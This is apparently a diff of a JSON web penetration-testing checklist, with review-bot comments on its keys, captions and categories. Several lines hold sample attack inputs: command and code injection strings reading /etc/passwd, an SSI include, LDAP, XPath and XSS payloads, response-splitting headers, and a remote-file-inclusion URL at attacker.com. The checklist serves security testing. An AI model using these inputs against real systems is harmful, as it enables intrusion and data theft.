+ "description": "Check the security of JWTs by ensuring strong signing algorithms, preventing tampering, and protecting sensitive data. Verify secure transmission, token expiration, and revocation practices.",
511
+ "tools": "Burp Suite, jwt_tool, jwtXploiter, ZAP",
512
+ "vrt_category": "broken_authentication_and_session_management"
421
513
  }
422
514
  ]
423
515
  },
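Review bot: The `tools` value on the `puzzling` step, a context line in this hunk, still reads `Burp Proxy, ZAP` while the commit renames `Burp Proxy` to `Burp Suite` on every other step it touches, so the rename is incomplete; change it to `"tools": "Burp Suite, ZAP",`. The new keys `concurrent` and `permission` are also far less descriptive than the rest of the file's keys (`account_suspension_resumption`, `json_web_token`), and `permission` on its own says nothing about sessions. If keys are stable identifiers consumed elsewhere they are hard to change later, so `concurrent_sessions` and `session_validity_after_permission_change` would be better chosen now to match the titles.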
@@ -431,61 +523,61 @@
431
523
  "key": "reflected_xss",
432
524
  "title": "Testing for Reflected Cross Site Scripting",
433
525
  "caption": "OTG-INPVAL-001, WAHHM - Test Handling of Input",
434
- "description": "Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.",
435
- "tools": "Burp Proxy, ZAP, Xenotix XSS"
526
+ "description": "Bypass input validation and leverage HTTP Parameter Pollution to inject XSS payloads, circumventing standard XSS detection vectors.",
527
+ "tools": "Arjun, Burp Suite (Param-miner), ZAP"
436
528
  },
437
529
  {
438
530
  "key": "stored_xss",
439
531
  "title": "Testing for Stored Cross Site Scripting",
440
532
  "caption": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
441
- "description": "Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF",
442
- "tools": "Burp Proxy, ZAP, BeEF, XSS Proxy",
533
+ "description": "Identify and exploit persistent cross-site scripting vectors within input handling and HTML rendering to achieve arbitrary JavaScript execution across multiple authenticated user contexts.",
534
+ "tools": "Burp Suite, XSSer, ZAP",
443
535
  "vrt_category": "cross_site_scripting_xss"
444
536
  },
445
537
  {
446
538
  "key": "http_verb_tampering",
447
539
  "title": "Testing for HTTP Verb Tampering",
448
540
  "caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
449
- "description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
450
- "tools": "netcat",
541
+ "description": "Forge non-standard HTTP requests to probe and circumvent URL-based authentication and authorization mechanisms.",
542
+ "tools": "Burp Suite, HTTPie, httpx, ZAP",
451
543
  "vrt_category": "server_security_misconfiguration"
452
544
  },
453
545
  {
454
546
  "key": "http_param_pollution",
455
547
  "title": "Testing for HTTP Parameter pollution",
456
548
  "caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
457
- "description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
458
- "tools": "ZAP, HPP Finder (Chrome Plugin)",
549
+ "description": "Identify bypasses in input validation and filtering mechanisms via HTTP Parameter Pollution (HPP) to inject malicious payloads through user-supplied data.",
550
+ "tools": "Arjun, Burp Suite (Param-miner), ZAP",
459
551
  "vrt_category": "server_side_injection"
460
552
  },
461
553
  {
462
554
  "key": "sql_injection",
463
555
  "title": "Testing for SQL Injection",
464
556
  "caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
465
- "description": "Union, Boolean, Error based, Out-of-band, Time delay.",
466
- "tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
557
+ "description": "Identify and exploit SQL injection vulnerabilities (Union, Boolean, Error-based, Out-of-band, Time-delay) to achieve unauthorized database access and data manipulation.",
558
+ "tools": "Burp Proxy (SQLipy), SQLMap",
467
559
  "vrt_category": "server_side_injection"
468
560
  },
469
561
  {
470
562
  "key": "oracle",
471
- "title": "Oracle Testing",
563
+ "title": "Testing for Oracle",
472
564
  "caption": "",
473
- "description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
474
- "tools": "Orascan, SQLInjector"
565
+ "description": "Discover PL/SQL web application endpoints, leverage PL/SQL packages for access, bypass exclusion mechanisms, and exploit SQL injection vulnerabilities.",
566
+ "tools": "SQLMap"
475
567
  },
476
568
  {
477
569
  "key": "mysql",
478
- "title": "MySQL Testing",
570
+ "title": "Testing for MySQL",
479
571
  "caption": "",
480
- "description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
481
- "tools": "SQLMap, Mysqloit, Power Injector"
572
+ "description": "Identify target MySQL version and leverage single quote injection via information_schema to achieve arbitrary file read/write capabilities.",
573
+ "tools": "SQLMap"
482
574
  },
483
575
  {
484
576
  "key": "sql_server",
485
- "title": "SQL Server Testing",
577
+ "title": "Testing for SQL Server",
486
578
  "caption": "",
487
- "description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
488
- "tools": "SQLMap, SQLninja, Power Injector"
579
+ "description": "Leverage comment operators, query separators, and stored procedures (like xp_cmdshell) to inject and execute arbitrary commands within the database.",
580
+ "tools": "SQLMap"
489
581
  },
490
582
  {
491
583
  "key": "postgre_sql",
@@ -496,47 +588,47 @@
496
588
  },
497
589
  {
498
590
  "key": "ms_access",
499
- "title": "MS Access Testing",
591
+ "title": "Testing for MS Access",
500
592
  "caption": "",
501
- "description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
593
+ "description": "Exploit error-based SQL injection (via GROUP BY) to enumerate database columns and extract schema information using targeted fuzzing lists.",
502
594
  "tools": "SQLMap"
503
595
  },
504
596
  {
505
597
  "key": "nosql_injection",
506
598
  "title": "Testing for NoSQL injection",
507
599
  "caption": "",
508
- "description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
600
+ "description": "Identify NoSQL database vulnerabilities by injecting special characters (' \" \\ ; { } ) and reserved keywords to manipulate query logic and potentially gain unauthorized access.",
509
601
  "tools": "NoSQLMap"
510
602
  },
511
603
  {
512
604
  "key": "ldap_injection",
513
605
  "title": "Testing for LDAP Injection",
514
606
  "caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
515
- "description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
516
- "tools": "Burp Proxy, ZAP",
607
+ "description": "Actively examining LDAP endpoints using specialized inputs to detect exploitable injection flaws that could lead to unauthorized data exposure or manipulation.",
608
+ "tools": "Burp Suite, ZAP",
517
609
  "vrt_category": "server_side_injection"
518
610
  },
519
611
  {
520
612
  "key": "orm_injection",
521
613
  "title": "Testing for ORM Injection",
522
614
  "caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
523
- "description": "Testing ORM injection is identical to SQL injection testing",
524
- "tools": "Hibernate, Nhibernate",
615
+ "description": "Analyze application data flow to detect injection points where crafted input can alter ORM-generated queries, enabling unintended database interactions.",
616
+ "tools": "SQLMap",
525
617
  "vrt_category": "server_side_injection"
526
618
  },
527
619
  {
528
620
  "key": "xml_injection",
529
621
  "title": "Testing for XML Injection",
530
622
  "caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
531
- "description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
532
- "tools": "Burp Proxy, ZAP, Wfuzz",
623
+ "description": "Analyze XML parsing mechanisms for vulnerabilities where maliciously structured XML input can be injected to manipulate application logic or extract sensitive data.",
624
+ "tools": "Burp Suite, oxml_xxe, XXEinjector, ZAP",
533
625
  "vrt_category": "server_side_injection"
534
626
  },
535
627
  {
536
628
  "key": "ssi_injection",
537
629
  "title": "Testing for SSI Injection",
538
630
  "caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
539
- "description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
631
+ "description": "Examine .shtml resources for server-side include processing flaws that allow the injection of control characters and directives to achieve arbitrary code execution or sensitive file access on the server.",
540
632
  "tools": "Burp Proxy, ZAP",
541
633
  "vrt_category": "server_side_injection"
542
634
  },
@@ -544,46 +636,46 @@
544
636
  "key": "xpath_injection",
545
637
  "title": "Testing for XPath Injection",
546
638
  "caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
547
- "description": "Check for XML error enumeration by supplying a single quote (').\nUsername: or 1=1\nPassword: or ‘1’ = ‘1",
548
- "tools": "Burp Proxy, ZAP",
639
+ "description": "Analyze XML path processing for vulnerabilities where crafted input, such as single quotes and logical OR conditions (e.g., ' or '1'='1), can be injected to induce errors revealing underlying structure or bypass authentication logic.",
640
+ "tools": "Burp Suite, ReadyAPI, ZAP",
549
641
  "vrt_category": "server_side_injection"
550
642
  },
551
643
  {
552
644
  "key": "imap_smtp_injection",
553
- "title": "IMAP/SMTP Injection",
645
+ "title": "Testing for IMAP/SMTP Injection",
554
646
  "caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
555
- "description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
556
- "tools": "Burp Proxy, ZAP",
647
+ "description": "Analyze mail client data handling for vulnerabilities where crafted input with special characters can be injected into IMAP/SMTP commands (headers, body, footer), potentially leading to unintended mail server actions or information disclosure.",
648
+ "tools": "Burp Suite, netcat, nmap IMAP/SMTP NSE script, ZAP",
557
649
  "vrt_category": "server_side_injection"
558
650
  },
559
651
  {
560
652
  "key": "code_injection",
561
653
  "title": "Testing for Code Injection",
562
654
  "caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
563
- "description": "Enter OS commands in the input field.?arg=1; system('id')",
564
- "tools": "Burp Proxy, ZAP, Liffy, Panoptic",
655
+ "description": "Analyze input fields for vulnerabilities where the injection of OS commands (e.g., ; system('id')) can lead to arbitrary command execution on the underlying system.",
656
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP",
565
657
  "vrt_category": "server_side_injection"
566
658
  },
567
659
  {
568
660
  "key": "local_file_inclusion",
569
661
  "title": "Testing for Local File Inclusion",
570
662
  "caption": "",
571
- "description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)",
572
- "tools": "Burp Proxy, fimap, Liffy"
663
+ "description": "Analyze application file handling for vulnerabilities where manipulated input with dot-dot-slash sequences (../../) or PHP wrappers (php://filter) can be used to access sensitive local files.",
664
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP"
573
665
  },
574
666
  {
575
667
  "key": "remote_file_inclusion",
576
668
  "title": "Testing for Remote File Inclusion",
577
669
  "caption": "",
578
- "description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
579
- "tools": "Burp Proxy, fimap, Liffy"
670
+ "description": "Analyze web applications for vulnerabilities where external URLs provided as parameters (e.g., ?file=http://attacker.com/malicious_page) can be included and executed by the server, leading to arbitrary code execution or data compromise.",
671
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP"
580
672
  },
581
673
  {
582
674
  "key": "command_injection",
583
675
  "title": "Testing for Command Injection",
584
676
  "caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
585
- "description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
586
- "tools": "Burp Proxy, ZAP, Commix",
677
+ "description": "Analyze application input handling to identify vulnerabilities where crafted payloads leveraging OS-specific syntax (e.g., ``;,|+`) can be injected to execute arbitrary operating system commands on the underlying server.",
678
+ "tools": "Burp Suite, ZAP",
587
679
  "vrt_category": "server_side_injection"
588
680
  },
589
681
  {
@@ -591,45 +683,93 @@
591
683
  "title": "Testing for Buffer overflow",
592
684
  "caption": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
593
685
  "description": "Testing for heap overflow vulnerability\nTesting for stack overflow vulnerability\nTesting for format string vulnerability",
594
- "tools": "Immunity Canvas, Spike, MSF, Nessus",
686
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP",
595
687
  "vrt_category": "server_side_injection"
596
688
  },
597
689
  {
598
690
  "key": "heap_overflow",
599
691
  "title": "Testing for Heap overflow",
600
692
  "caption": "",
601
- "description": "",
602
- "tools": ""
693
+ "description": "Examining dynamic memory allocation to detect if writing beyond allocated heap buffers can corrupt data structures, potentially enabling arbitrary code execution.",
694
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
603
695
  },
604
696
  {
605
697
  "key": "stack_overflow",
606
698
  "title": "Testing for Stack overflow",
607
699
  "caption": "",
608
- "description": "",
609
- "tools": ""
700
+ "description": "Investigating function call mechanisms to find if excessive data written to the stack can overwrite return addresses or local variables, potentially leading to control-flow redirection.",
701
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
610
702
  },
611
703
  {
612
704
  "key": "format_string",
613
705
  "title": "Testing for Format string",
614
706
  "caption": "",
615
- "description": "",
616
- "tools": ""
707
+ "description": "Probing input handling with format specifiers to determine if attacker-controlled strings can be used to read from or write to arbitrary memory locations.",
708
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
617
709
  },
618
710
  {
619
711
  "key": "incubated_vulnerabilities",
620
- "title": "Testing for incubated vulnerabilities",
712
+ "title": "Testing for Incubated Vulnerabilities",
621
713
  "caption": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
622
- "description": "File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)",
623
- "tools": "Burp Proxy, BeEF, MSF",
714
+ "description": "Analyze application components (file upload, data handling, server configurations) for latent vulnerabilities like Stored XSS and SQL/XPath Injection, and identifying misconfigurations that could be exploited over time.",
715
+ "tools": "Burp Suite, ZAP",
624
716
  "vrt_category": "server_security_misconfiguration"
625
717
  },
626
718
  {
627
- "key": "http_splitting_and_smuggling",
628
- "title": "Testing for HTTP Splitting/Smuggling",
719
+ "key": "http_response_splitting",
720
+ "title": "Testing for HTTP Response Splitting",
721
+ "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
722
+ "description": "Analyze HTTP header handling for vulnerabilities allowing the injection of CRLF sequences (%0d%0a) to manipulate server responses and potentially conduct cross-user attacks.",
723
+ "tools": "Burp Suite, netcat, ZAP",
724
+ "vrt_category": "server_side_injection"
725
+ },
726
+ {
727
+ "key": "http_request_smuggling",
728
+ "title": "Testing for HTTP Request Smuggling",
629
729
  "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
630
- "description": "param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>",
631
- "tools": "Burp Proxy, ZAP, netcat",
730
+ "description": "Analyze backend HTTP processing for discrepancies in request parsing that allow the injection and misrouting of subsequent requests.",
731
+ "tools": "Burp Suite, netcat, ZAP",
632
732
  "vrt_category": "server_side_injection"
733
+ },
734
+ {
735
+ "key": "host_header_injection",
736
+ "title": "Testing for Host Header Injection",
737
+ "caption": "OTG-INPVAL-017",
738
+ "description": "Analyze application handling of the Host header for vulnerabilities allowing manipulation to conduct actions like cache poisoning or redirect users to malicious sites.",
739
+ "tools": "Burp Suite, curl, ZAP",
740
+ "vrt_category": "server_security_misconfiguration"
741
+ },
742
+ {
743
+ "key": "server_side_template_injection",
744
+ "title": "Testing for Server-side Template Injection",
745
+ "caption": "OTG-INPVAL-018",
746
+ "description": "Analyze server-side template rendering for vulnerabilities allowing injection of malicious code within template syntax to achieve remote code execution or data exfiltration.",
747
+ "tools": "Burp Suite, ZAP",
748
+ "vrt_category": "server_security_misconfiguration"
749
+ },
750
+ {
751
+ "key": "server_side_request_forgery",
752
+ "title": "Testing for Server-Side Request Forgery",
753
+ "caption": "OTG-INPVAL-019",
754
+ "description": "Probe application functionality that handles external URLs to identify vulnerabilities allowing unauthorized server-initiated requests.",
755
+ "tools": "Burp Suite, interactsh, SSRFmap",
756
+ "vrt_category": "server_security_misconfiguration"
757
+ },
758
+ {
759
+ "key": "insecure_deserialization",
760
+ "title": "Testing for Insecure Deserialization",
761
+ "caption": "",
762
+ "description": "Analyze application endpoints that deserialize data for vulnerabilities allowing manipulation of serialized objects to achieve arbitrary code execution or other malicious outcomes.",
763
+ "tools": "Burp Suite, ysoserial, ZAP",
764
+ "vrt_category": "server_security_misconfiguration"
765
+ },
766
+ {
767
+ "key": "testing_for_graphql",
768
+ "title": "Testing for GraphQL",
769
+ "caption": "",
770
+ "description": "Assess GraphQL implementations for vulnerabilities related to introspection, denial-of-service via complex queries, and insecure field access.",
771
+ "tools": "Burp Suite (GraphQL Raider), graphql-cop, GraphQLmap, InQL",
772
+ "vrt_category": "server_security_misconfiguration"
633
773
  }
634
774
  ]
635
775
  },
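Review bot: `http_response_splitting` and `http_request_smuggling` both carry `"caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input"`, so the OTG reference no longer identifies a single step now that the old combined `http_splitting_and_smuggling` entry has been split in two, and any consumer that groups or deduplicates by caption would presumably merge them. The other entries added in this hunk use distinct identifiers (`OTG-INPVAL-017` through `OTG-INPVAL-019`), so the smuggling entry should either get its own identifier or, if the split is not mirrored in the referenced methodology, an empty `"caption": ""` like the remaining new entries. Separately, `server_side_template_injection` is filed under `"vrt_category": "server_security_misconfiguration"` while the neighbouring injection steps (`ssi_injection`, `xpath_injection`, `command_injection`, and both new HTTP entries) use `"server_side_injection"`; since the VRT mapping keys on this field, the category should be confirmed before release.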
@@ -643,16 +783,24 @@
643
783
  "key": "error_codes",
644
784
  "title": "Analysis of Error Codes",
645
785
  "caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
646
- "description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
647
- "tools": "Burp Proxy, ZAP",
786
+ "description": "Examine error messages and handling mechanisms for disclosure of sensitive data, internal system details, or potential for denial-of-service.",
787
+ "tools": "Burp Suite, ZAP",
648
788
  "vrt_category": "server_security_misconfiguration"
649
789
  },
650
790
  {
651
791
  "key": "stack_traces",
652
792
  "title": "Analysis of Stack Traces",
653
793
  "caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
654
- "description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
655
- "tools": "Burp Proxy, ZAP",
794
+ "description": "Check application responses for exposed stack traces that could disclose sensitive internal information.",
795
+ "tools": "Burp Suite, ZAP",
796
+ "vrt_category": "server_security_misconfiguration"
797
+ },
798
+ {
799
+ "key": "forbidden_bypass",
800
+ "title": "Testing for 403 forbidden bypass",
801
+ "caption": "",
802
+ "description": "Test various techniques like HTTP verb manipulation, URL encoding, directory traversal, header manipulation, path fuzzing, case manipulation, adding a trailing slash, and attaching a URL fragment to bypass 403 Forbidden errors",
803
+ "tools": "Burp Suite (403-bypasser), ZAP, 403jump",
656
804
  "vrt_category": "server_security_misconfiguration"
657
805
  }
658
806
  ]
@@ -668,24 +816,32 @@
668
816
  "title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
669
817
  "caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
670
818
  "description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
671
- "tools": "testssl.sh, SSL Breacher",
819
+ "tools": "testssl.sh, nmap --script ssl-enum-ciphers",
672
820
  "vrt_category": "server_security_misconfiguration"
673
821
  },
674
822
  {
675
823
  "key": "padding_oracle",
676
824
  "title": "Testing for Padding Oracle",
677
825
  "caption": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
678
- "description": "Compare the responses in three different states:\nCipher text gets decrypted, resulting data is correct.\nCipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.\nCipher text decryption fails due to padding errors.",
679
- "tools": "PadBuster, Poracle, python-paddingoracle, POET",
826
+ "description": "Evaluate application behavior across three ciphertext states: valid decryption, decryption resulting in errors (non-padding), and padding-related decryption failures.",
827
+ "tools": "Burp Suite (Padding Oracle Hunter), PadBuster, python-paddingoracle, POET",
680
828
  "vrt_category": "broken_authentication_and_session_management"
681
829
  },
682
830
  {
683
831
  "key": "unencrypted_channels",
684
832
  "title": "Testing for Sensitive information sent via unencrypted channels",
685
833
  "caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
686
- "description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
687
- "tools": "Burp Proxy, ZAP, Curl",
834
+ "description": "Ensure encrypted transport for sensitive information: authentication secrets, session tokens, and protected data (e.g., PCI, customer records)",
835
+ "tools": "Burp Suite, curl, ZAP",
688
836
  "vrt_category": "broken_authentication_and_session_management"
837
+ },
838
+ {
839
+ "key": "weak_encryption",
840
+ "title": "Testing for Weak Encryption",
841
+ "caption": "OTG-CRYPST-004, WAHHM - Test Handling of Access",
842
+ "description": "Identify weak encryption algorithms (e.g., MD5, SHA-1) in storage or transit.",
843
+ "tools": "DevTools, Burp Suite, ZAP",
844
+ "vrt_category": "cryptographic_weakness"
689
845
  }
690
846
  ]
691
847
  },
@@ -699,70 +855,94 @@
699
855
  "key": "data_validation",
700
856
  "title": "Test Business Logic Data Validation",
701
857
  "caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
702
- "description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
703
- "tools": "Burp Proxy, ZAP",
858
+ "description": "Evaluate business logic for proper data validation implementation, covering range checks, format validation, consistency checks, and adherence to business rules.",
859
+ "tools": "Burp Suite, ZAP",
704
860
  "vrt_category": "broken_access_control"
705
861
  },
706
862
  {
707
863
  "key": "forge_requests",
708
864
  "title": "Test Ability to Forge Requests",
709
865
  "caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
710
- "description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
711
- "tools": "Burp Proxy, ZAP",
866
+ "description": "Test the ability to forge HTTP requests to assess potential vulnerabilities related to request manipulation and unauthorized actions.",
867
+ "tools": "Burp Suite, ZAP",
712
868
  "vrt_category": "server_side_injection"
713
869
  },
714
870
  {
715
871
  "key": "integrity_check",
716
872
  "title": "Test Integrity Checks",
717
873
  "caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
718
- "description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
719
- "tools": "Burp Proxy, ZAP",
874
+ "description": "Validate data integrity across application components (inputs, databases, logs) by verifying expected data types, formats, and authorized modifications based on business logic. Attempt to inject invalid data and unauthorized operations.",
875
+ "tools": "Burp Suite, ZAP",
720
876
  "vrt_category": "broken_access_control"
721
877
  },
722
878
  {
723
879
  "key": "process_timing",
724
880
  "title": "Test for Process Timing",
725
881
  "caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
726
- "description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
727
- "tools": "Burp Proxy, ZAP",
882
+ "description": "Exploit race conditions via timing attacks.",
883
+ "tools": "Burp Suite (Turbo Intruder), ZAP",
728
884
  "vrt_category": "server_side_injection"
729
885
  },
730
886
  {
731
887
  "key": "usage_limits",
732
888
  "title": "Test Number of Times a Function Can be Used Limits",
733
889
  "caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
734
- "description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
735
- "tools": "Burp Proxy, ZAP",
890
+ "description": "Attempt to exceed defined rate limits on critical endpoints to verify proper implementation and resilience.",
891
+ "tools": "Burp Suite, ZAP",
736
892
  "vrt_category": "broken_access_control"
737
893
  },
738
894
  {
739
895
  "key": "workflow_circumvention",
740
896
  "title": "Testing for the Circumvention of Work Flows",
741
897
  "caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
742
- "description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
743
- "tools": "Burp Proxy, ZAP",
898
+ "description": "Skip workflow steps (e.g., payment) for unauthorized access.",
899
+ "tools": "Burp Suite, ZAP",
744
900
  "vrt_category": "broken_access_control"
745
901
  },
746
902
  {
747
903
  "key": "application_misuse",
748
904
  "title": "Test Defenses Against Application Mis-use",
749
905
  "caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
750
- "description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
751
- "tools": "Burp Proxy, ZAP"
906
+ "description": "Test for vulnerabilities allowing abuse of application functionality (e.g., excessive resource consumption, unintended workflows).",
907
+ "tools": "Burp Suite, ZAP"
752
908
  },
753
909
  {
754
910
  "key": "upload_unexpected_files",
755
911
  "title": "Test Upload of Unexpected File Types",
756
912
  "caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
757
- "description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
758
- "tools": "Burp Proxy, ZAP"
913
+ "description": "Test Upload of Unexpected File Types to assess the application's handling of non-standard file uploads and prevent potential security risks like remote code execution.",
914
+ "tools": "Burp Suite, curl, ZAP"
759
915
  },
760
916
  {
761
917
  "key": "malicious_files",
762
918
  "title": "Test Upload of Malicious Files",
763
919
  "caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
764
- "description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
765
- "tools": "Burp Proxy, ZAP",
920
+ "description": "Test Upload of Malicious Files to Assess Potential for Remote Code Execution, Data Exposure, or System Compromise.",
921
+ "tools": "Burp Suite, curl, ZAP",
922
+ "vrt_category": "server_security_misconfiguration"
923
+ },
924
+ {
925
+ "key": "exif_metadata",
926
+ "title": "Testing for Stripped EXIF Geolocation Metadata in Uploaded Images",
927
+ "caption": "",
928
+ "description": "Check uploaded images for unstripped EXIF metadata leaking sensitive data.",
929
+ "tools": "exiftool",
930
+ "vrt_category": "server_security_misconfiguration"
931
+ },
932
+ {
933
+ "key": "csv_injection",
934
+ "title": "Testing for CSV Injection",
935
+ "caption": "",
936
+ "description": "Check for formula injection vulnerabilities in CSV export functionality.",
937
+ "tools": "Burp Suite, ZAP",
938
+ "vrt_category": "server_security_misconfiguration"
939
+ },
940
+ {
941
+ "key": "password_requirement",
942
+ "title": "Testing for Lack of Password Confirmation",
943
+ "caption": "",
944
+ "description": "Verify absence of password confirmation prompts for sensitive actions: Account deletion, email change, password change, and 2FA management.",
945
+ "tools": "Browser, Burp Suite, ZAP",
766
946
  "vrt_category": "server_security_misconfiguration"
767
947
  }
768
948
  ]
@@ -775,97 +955,109 @@
775
955
  "items": [
776
956
  {
777
957
  "key": "dom_based_xss",
778
- "title": "Testing for DOM based Cross Site Scripting",
958
+ "title": "Testing for DOM-based Cross-Site Scripting",
779
959
  "caption": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
780
- "description": "Test for the user inputs obtained from client-side JavaScript Objects",
781
- "tools": "Burp Proxy, DOMinator",
960
+ "description": "Analyze client-side JavaScript for vulnerabilities where attacker-controlled data in the DOM can be manipulated to execute malicious scripts.",
961
+ "tools": "Browser, Burp Suite, DOMinator, ZAP",
782
962
  "vrt_category": "cross_site_scripting_xss"
783
963
  },
784
964
  {
785
965
  "key": "javascript_execution",
786
966
  "title": "Testing for JavaScript Execution",
787
967
  "caption": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
788
- "description": "Inject JavaScript code:\nwww.victim.com/?javascript:alert(1)",
789
- "tools": "Burp Proxy, ZAP",
968
+ "description": "Test for the ability to inject and execute malicious JavaScript.",
969
+ "tools": "Browser, Burp Suite, ZAP",
790
970
  "vrt_category": "cross_site_scripting_xss"
791
971
  },
792
972
  {
793
973
  "key": "html_injection",
794
974
  "title": "Testing for HTML Injection",
795
975
  "caption": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
796
- "description": "Send malicious HTML code:\n?user=<img%20src='aaa'%20onerror=alert(1)>",
797
- "tools": "Burp Proxy, ZAP",
976
+ "description": "Check input fields and website areas for the ability to inject arbitrary HTML code.",
977
+ "tools": "Browser, Burp Suite, ZAP",
798
978
  "vrt_category": "server_side_injection"
799
979
  },
800
980
  {
801
981
  "key": "url_redirect",
802
- "title": "Testing for Client Side URL Redirect",
982
+ "title": "Testing for Client-Side URL Redirect",
803
983
  "caption": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
804
- "description": "Modify untrusted URL input to a malicious site:\n(Open Redirect)?redirect=www.fake-target.site",
805
- "tools": "Burp Proxy, ZAP",
984
+ "description": "Analyze client-side code for manipulable redirect parameters that could lead to phishing or malicious site redirects.",
985
+ "tools": "Browser, Burp Suite, ZAP",
806
986
  "vrt_category": "unvalidated_redirects_and_forwards"
807
987
  },
808
